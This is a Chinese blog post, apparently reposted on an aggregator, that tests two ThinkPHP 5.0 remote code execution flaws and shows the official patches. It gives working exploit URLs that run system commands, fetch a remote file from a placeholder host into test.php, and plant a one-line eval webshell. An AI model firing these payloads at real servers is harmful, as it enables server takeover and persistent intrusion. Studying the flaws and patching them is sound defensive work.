ThinkPHP5.0 漏洞测试

2023年5月26日上午2:35 • 大数据 • 阅读 74

ThinkPHP5.0 漏洞测试

自从ThinkPHP发布漏洞补丁以来，服务器不知道多少次受到了批量扫描漏洞来抓取肉鸡的请求
虽然官方早已发布补丁，还是想试一下TP漏洞，测试两个漏洞

一、全版本执行漏洞

http://127.0.0.1/ThinkPHP/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

由于对控制器名没有明确的检测，在没有开启强制路由的情况下，直接就可以执行phpinfo()，如果服务器未限制shell等函数的执行，便可以直接执行shell提权

详细的漏洞执行过程可以参考

官方补丁

加入正则表达式来限制控制器名

/* /thinkphp/library/think/App.php 555行 加入 */if (!preg_match('/^[A-Za-z](\w)*$/', $controller)) {     throw new HttpException(404, 'controller not exists:' . $controller);}

二、_method漏洞

http://127.0.0.1/ThinkPHP/index.php?s=captchaContent-Type:application/x-www-form-urlencoded_method=__construct&filter[]=system&method=GET&get[]=dir

触发条件

//Config.php'var_method'             => '_method'

利用 $_POST['_method']变量来传递真实的请求方法，当 $_POST['_method']=__construct时，Request类的method方法便会将该类的变量进行覆盖，利用该方式将filter变量覆盖为system等函数名，当内部进行参数过滤时便会进行执行任意命令

基于此可以直接上传PHP文件 test.php

http://127.0.0.1/ThinkPHP/index.php?s=captcha&fileDown=copy("http://xxx/1.txt","test.php")Content-Type:application/x-www-form-urlencoded_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=fileDown

生成一句话木马

http://127.0.0.1/ThinkPHP/index.php?s=captcha&T=echo+^+phpinfo();eval（$_POST[cmd]);?^>+>>info.phpContent-Type:application/x-www-form-urlencoded_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=123

可以在config.php将_method设置为其他字符，或者升级TP

官方补丁

官方补丁中限制了_method可疑设置的请求方法，并在处理_method之后将其unset，无法再利用__construct进行变量覆盖

/* thinkphp/library/think/Request.php */ public function method($method = false)    {        if (true === $method) {            // 获取原始请求类型            return IS_CLI ? 'GET' : (isset($this->server['REQUEST_METHOD']) ? $this->server['REQUEST_METHOD'] : $_SERVER['REQUEST_METHOD']);        } elseif (!$this->method) {            if (isset($_POST[Config::get('var_method')])) {                $method = strtoupper($_POST[Config::get('var_method')]);                if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) {                    $this->method = $method;                    $this->{$this->method}($_POST);                } else {                    $this->method = 'POST';                }                unset($_POST[Config::get('var_method')]); //unset            } elseif (isset($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE'])) {                $this->method = strtoupper($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE']);            } else {                $this->method = IS_CLI ? 'GET' : (isset($this->server['REQUEST_METHOD']) ? $this->server['REQUEST_METHOD'] : $_SERVER['REQUEST_METHOD']);            }        }        return $this->method;    }

参考文章：https://mrxn.net/Infiltration/618.htmlhttps://www.vulnbug.com/amp/thkphp5x-code-execution-vulnerabilities-and-bypass.htmlhttps://www.freebuf.com/vuls/194127.html

Original: https://blog.51cto.com/u_15659138/5339464
Author: WindrunnerMax
Title: ThinkPHP5.0 漏洞测试

原创文章受到原创版权保护。转载请注明出处：https://www.johngo689.com/517714/

转载文章受原作者版权保护。转载请注明原作者出处！

大数据

【自取】最近整理的，有需要可以领取学习：

Linux核心资料大放送~

全栈面试题汇总（持续更新&可下载）

一个提高学习100%效率的工具！

【超详细】深度学习面试题目！

LeetCode Python刷题答案下载！

LeetCode Java版刷题答案下载！

LeetCode C++ 版本，抓紧保存！

LeetCode GO语言刷题答案下载！

hive的使用

大数据 2023年11月14日
0052
docker 可视化工具shipyard

3.1 下载镜像 3.2 安装如下docker 3.3 将所有docker纳入管理 3.4 登陆访问页面 3.5 重启 service docker restart docker …

大数据 2023年5月29日
0079
Android-第十三节03SQLite数据库详解

目录一、SQLite数据库概述 * 1.1SQLite 是一个嵌入式数据库引擎 1.2SQLite和Mysql数据库存储区别二、SQLite数据库的使用方法 * 2.1SQLi…

大数据 2023年11月11日
0050
简单上手Python SQLite 的10分钟教程

简单上手Python SQLite 的10分钟教程前言编程过程中数据库的重要性不言而喻 , 在Python中想要快速使用数据库读写少量数据sqlite是个很好的选择 , 相信看…

大数据 2023年11月11日
0035
C#：Winfrom 实现DataGridView 自定义分页

目录安装Dapper依赖安装SQLite依赖新建SQLite数据库文件主要代码示例运行界面今天给大家分享Winform实现DataGridView 自定义分页的案例，感…

大数据 2023年11月11日
0038
Android -SQLite 的增删改查（CRUD）

SQLiteDatabase 管理类，用于数据库层面的操作。 openDatabase：打开指定路径的数据库。 isOpen：判断数据库是否已打开。 close：关闭数据库。 ge…

大数据 2023年11月11日
0039
Android的SharedPreferences和SQLite

SharedPreferences 文件，类比.properties文件，数据存储都是使用键值对来存储获取方式有几种？区别是什么？ getSharedPreferences(参数…

大数据 2023年11月12日
0055
使用curl命令上传jar包到jfrog

使用curl命令上传jar包到jfrog 原创运维灬小兵2022-06-28 17:24:23博主文章分类：Linux ©著作权文章标签 curl上传包到jfrog curl …

大数据 2023年5月26日
0079
【python实现网络爬虫（2）】网络爬虫基础

网络爬虫是啥网络和爬虫：当今最大的网络是互联网，最大的爬虫就是就是各类搜索引擎，包括谷歌、百度等网络爬虫：就是按照一定的规则去爬取人类所需要信息的程序，主要通过去URL的请…

大数据 2023年5月25日
0065
Longformer论文解读和代码解析

前言这篇博文记录了longformer论文的主要思想、代码实现和结果复现方面的一些工作，相关链接如下：原longformer论文地址github上原作者公开的代码huggingf…

大数据 2023年5月28日
00102
2022年SQL经典面试题总结（带解析）

一、选择题（1）基础题 1、要求删除商品表中价格大于3000的商品，下列SQL语句正确的是（） A、DELETE FROM 商品 WHERE 价格>3000 B、DELET…

大数据 2023年11月12日
0038
大数据技术架构(组件)——Hive：环境准备3

1.0.2、服务启动在搭建Hadoop的环节中，已经将Hadoop服务启动了，这里将Hive Metastore服务启动 hive –service metastore 1.0…

大数据 2023年11月12日
0032
在docker 中使用ll命令

要显示文件夹内的文件及文件夹，要使用ll -a 命令通过以下设置即可 vim ~/.bashrc 加入一行 alias ll=’ls $LS_OPTIONS -l&#…

大数据 2023年5月29日
0068
Sqlite注入基础

更多渗透技能欢迎搜索公众号：白帽子左一作者：掌控安全-手电筒前置知识 Sqlite数据库的特点是它每一个数据库都是一个文件，当你查询表的完整信息时会得到创建表的语句，基本和m…

大数据 2023年11月11日
0061
一个python二维列表格式化美观输出的题目

来自基友的一个问题：用python实现输入是一个二维list，一个可能的输入如下所示： Input_list = [ [“china”,”i…

大数据 2023年6月3日
0071
面试：Sqlite的线程、进程安全性

1、如果是单进程多线程，多线程访问数据库的时候会出现这样的异常，Sqlite 自身是不支持多线程同时操作的 java.lang.IllegalStateException: Can…

大数据 2023年11月11日
0039

2024 年 5 月
一	二	三	四	五	六	日
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

ThinkPHP5.0 漏洞测试

ThinkPHP5.0 漏洞测试

一、全版本执行漏洞

官方补丁

二、_method漏洞

官方补丁

大家都在看